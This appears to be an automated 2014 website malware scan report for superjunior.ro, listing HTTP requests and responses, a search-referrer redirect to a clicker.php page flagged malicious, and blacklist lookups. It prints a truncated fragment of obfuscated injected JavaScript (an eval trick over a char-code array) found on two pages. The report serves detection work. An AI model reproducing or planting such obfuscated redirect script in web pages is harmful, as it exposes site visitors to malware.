Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://superjunior.ro/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: superjunior.ro Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 14 Sep 2014 09:52:23 GMT Location: http://coopmatrix.it/clicker.php Server: Apache Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://superjunior.ro/ | 200 OK Content-Length: 31273 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=247;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,97,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,98,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,10 Antivirus reports:
| ||
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://superjunior.ro/Scripts/swfobject_modified.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:25 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=dvdrljqt3tu4hmb5u8hv35o6h0; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:25 GMT | clean |
http://www.superjunior.ro/index.php?m=7 | 200 OK Content-Length: 34599 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=247;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,97,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,98,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,92,105,106,103,101,90,110,10 Antivirus reports:
| ||
http://www.superjunior.ro/Scripts/swfobject_modified.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:27 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6ai9vumvpr3r8mh0eq47l8qrh4; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:27 GMT | clean |
http://www.superjunior.ro/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:29 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=qu4tuimqfit2nt6g1124g9eda7; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:29 GMT | clean |
http://superjunior.ro/Scripts/servicecall.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:30 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ee5a910l3900sd74ccevbkg195; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:30 GMT | clean |
http://superjunior.ro/Scripts/functions.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:31 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=5ln0fo5uh4p0d6lemtlblsc9d1; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:31 GMT | clean |
http://storage.trafic.ro/js/trafic.js | 200 OK Content-Length: 204 Content-Type: application/x-javascript | clean |
http://superjunior.ro/Scripts/../../functions.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 14 Sep 2014 09:52:33 GMT Pragma: no-cache Location: http://www.superjunior.ro/index.php?m=7 Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=j4n065ottsoh97kpuq48b3il10; path=/ Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Sun, 14-Sep-2014 12:52:33 GMT | clean |
http://superjunior.ro/servicecall.js | 200 OK Content-Length: 3177 Content-Type: text/javascript | clean |
http://superjunior.ro/functions.js | 200 OK Content-Length: 1205 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=superjunior.ro
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://superjunior.ro/
Result: superjunior.ro is not infected or malware details are not published yet.
Result: superjunior.ro is not infected or malware details are not published yet.